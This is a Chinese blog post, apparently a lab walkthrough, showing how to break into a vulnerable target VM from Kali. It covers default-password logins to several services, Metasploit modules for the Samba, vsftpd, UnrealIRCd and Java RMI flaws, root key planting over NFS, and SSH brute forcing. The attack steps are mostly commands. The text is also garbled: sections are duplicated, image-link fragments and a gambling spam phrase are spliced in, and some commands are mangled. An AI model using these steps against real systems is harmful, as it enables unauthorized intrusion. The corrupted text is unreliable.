电脑黑客代码教学黑客编程代码

每日寄语

一切努力,都不是为了让别人觉得你很厉害,而是为了让自己能从内心看到自己。

阅前声明

1、人为联合发布Kali和编程笔名:件!

2、往后看,还有福利哦!

一、用系统弱密码登录

1、在kali上运行命令行telnet 192.168.26.129

2、登录和密码均输入MSF管理员

3、登录成功进入系统

4、测试如下。

二、用MySQL弱密码登录:

1、在kali上运行MySQLh 192.168.26.129uroot

2、登录成功进入MySQL系统

3、测试效果:

三.用PostgreSQL弱密码登录

1、在Kali上运行psql-h 192.168.26.129u postgres

2、输入密码: postgres

3、登录成功进入postgresql系统

测试效果

四.用VNC弱密码登录

1、在kali图形界面终端上运行VNC查看器192.168.26.129

2、输入密码密码

3、登录成功进入系统

测试效果:

五. sambams-RPC外壳指令注入漏洞

利用步骤

在kali上运行MSF控制台并启动metasploit

2 .选择use exploit/multi/samba/user map _ script、漏洞库

3.Set RHOST 192.168.160.131设置攻击机器的IP

4 .退出,开始攻击

5 .成功使用并执行unamea验证

测试效果:

六. Vsftpd源封装后门漏洞

步骤

1、在kali上运行MSF控制台,启动metasploit

2、use exploit/UNIX/FTP/vsftpd _ 234 _ back door,选择漏洞

3、set RHOST 192.168.160.131

4、成功使用,执行unamea验证

5、测试流程:

om/origin/pgc-image/03e49fcfa700467f927fd6e136a5f721?from=pc”>

七、UnreallRCd后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

set RHOST 192.168.160.131 ,设置要攻击的目标IP地址

3、开始攻击

4、利用成功!使用uname –a 验证

测试效果:

Linux NFS共享目录配置漏洞

问题:在(2)中需要创建 /tmp/test目录并在目录下创建,如未创建则不能进行下一步

步骤

在kali上执行命令rpcinfo –p 192.168.26.129 ,查看nfs服务有无开启showmount –e 192.168.26.129 查看其设置的远程目录列表输入ssh-keygen 生成RSA公钥依次输入:

(1)mount –t nfs 192.168.26.129://tmp/test预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;

注:如果提示下图中错误则需要/etc/init.d/rpcbind start 来启动mount

(2)cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下:

(3)ssh root@192.168.26.129,实现无密码登录

Java RMI SERVER 命令执行漏洞(1099/tcp)

1.Nmap –p 0-65535 192.168.160.131 来查看1099端口是否开启

2.进入msfconsole框架,依次输入以下命令:

1)use exploit/multi/misc/java_rmi_server

2)set RHOST 192.168.26.129靶机的IP地址)

3)run

4)session

5)shell进入meterpreter时执行)

十、Root用户弱口令漏洞(SSH爆破)

步骤

输入二分快三计划mage/f50f6ec8f5bb4faeba639f8fa6e55b42?from=pc”>

Java RMI SERVER 命令执行漏洞(1099/tcp)

1.Nmap –p 0-65535 192.168.160.131 来查看1099端口是否开启

2.进入msfconsole框架,依次输入以下命令:

1)use exploit/multi/misc/java_rmi_server

2)set RHOST 192.168.26.129靶机的IP地址)

3)run

4)session

5)shell进入meterpreter时执行)

十、Root用户弱口令漏洞(SSH爆破)

步骤

输入nmap –sV -O(大写) 192.168.160.131 查看SSh端口是否开启开启metasploit framework 框架,依次输入:use auxiliary/scanner/ssh/ssh_loginset RHOSTS 192.168.160.131set USERNAME rootset PASS_FILE pass.txt字典文件,需要预先生成)set THREADS 50run

Published by

风君子

独自遨游何稽首 揭天掀地慰生平

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注